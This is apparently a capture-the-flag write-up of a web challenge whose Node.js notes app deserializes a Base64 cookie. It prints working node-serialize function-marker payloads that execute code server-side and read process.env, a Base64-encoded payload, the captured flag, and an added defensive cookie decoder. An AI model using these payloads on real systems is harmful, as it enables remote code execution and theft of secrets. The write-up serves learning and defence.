Challenge Description

  • Difficulty : Medium
  • Points : 250
  • Category : Web

Walkthrough

The black note application allows us to self-register and save notes. After self-registering and logging in, I noticed a cookie named notes. Inspecting it revealed that it is Base64-encoded JSON data for the notes that are displayed on the page.

Since we know that the backend is Node.js and the cookie is actually getting deserialized, this is obviously a JSON deserialization vulnerability via the notes cookie.

The following articles are helpful in this regard.

I sent the Base64-encoded version of the following payload in the notes cookie to see if my assumption was right.

{"notes":"_$$ND_FUNC$$_function (){ return 'hi'; }()"}

Indeed, it was right. The next step was checking whether we have access to the this object.

{"notes":"_$$ND_FUNC$$_function (){ return this; }()"}

Nice! We have access to the this object and can now use it to reveal information from the backend system or gain code execution. Since we know that the flag is stored in an environment variable, we can extract it as follows.

{"notes":"_$$ND_FUNC$$_function (){ return this.process.env; }()"}

Base64 : eyJub3RlcyI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbiAoKXsgcmV0dXJuIHRoaXMucHJvY2Vzcy5lbnY7IH0oKSJ9
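As an added example (not part of the original writeup or the challenge's own code), here is how a defender would handle this cookie safely. The _$$ND_FUNC$$_ prefix in the payloads above is the function marker of the node-serialize npm package, whose unserialize() evaluates such strings; plain JSON.parse never executes code, and the decoder below additionally rejects any value carrying that marker so the raw cookie never reaches an unsafe deserializer. The cookie name and the benign note are assumptions.

```javascript
// Added example: safe handling of a Base64-encoded JSON "notes" cookie.
// The marker below is the function prefix used by node-serialize; a string
// starting with it is what an unsafe unserialize() would eval.
const FUNC_MARKER = '_$$ND_FUNC$$_';

// Recursively walk a decoded JSON value and report whether any string in it
// begins with the serialized-function marker.
function containsFunctionMarker(value) {
  if (typeof value === 'string') return value.startsWith(FUNC_MARKER);
  if (Array.isArray(value)) return value.some(containsFunctionMarker);
  if (value !== null && typeof value === 'object') {
    return Object.values(value).some(containsFunctionMarker);
  }
  return false;
}

// Decode the cookie with JSON.parse only (no code execution possible), then
// reject anything that smuggles a function marker. Returns { ok, notes | reason }.
function decodeNotesCookie(cookieValue) {
  let parsed;
  try {
    parsed = JSON.parse(Buffer.from(cookieValue, 'base64').toString('utf8'));
  } catch (err) {
    return { ok: false, reason: 'cookie is not valid Base64 JSON' };
  }
  if (containsFunctionMarker(parsed)) {
    // Worth logging: this is a deserialization attack attempt, not a bug.
    return { ok: false, reason: 'serialized function marker in notes cookie' };
  }
  return { ok: true, notes: parsed };
}

// Constructed sample inputs: an assumed benign note list, and the Base64
// value shown in this writeup (it decodes to the process.env payload).
const benignCookie = Buffer.from(JSON.stringify({ notes: ['buy milk'] })).toString('base64');
const writeupCookie =
  'eyJub3RlcyI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbiAoKXsgcmV0dXJuIHRoaXMucHJvY2Vzcy5lbnY7IH0oKSJ9';

console.log(decodeNotesCookie(benignCookie));   // { ok: true, notes: { notes: [ 'buy milk' ] } }
console.log(decodeNotesCookie(writeupCookie));  // { ok: false, reason: '...function marker...' }
```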

Flag

Flag: BlackHatMEA{196:18:350d71cf705c5bbfb62e26ed84df5a0350142d71}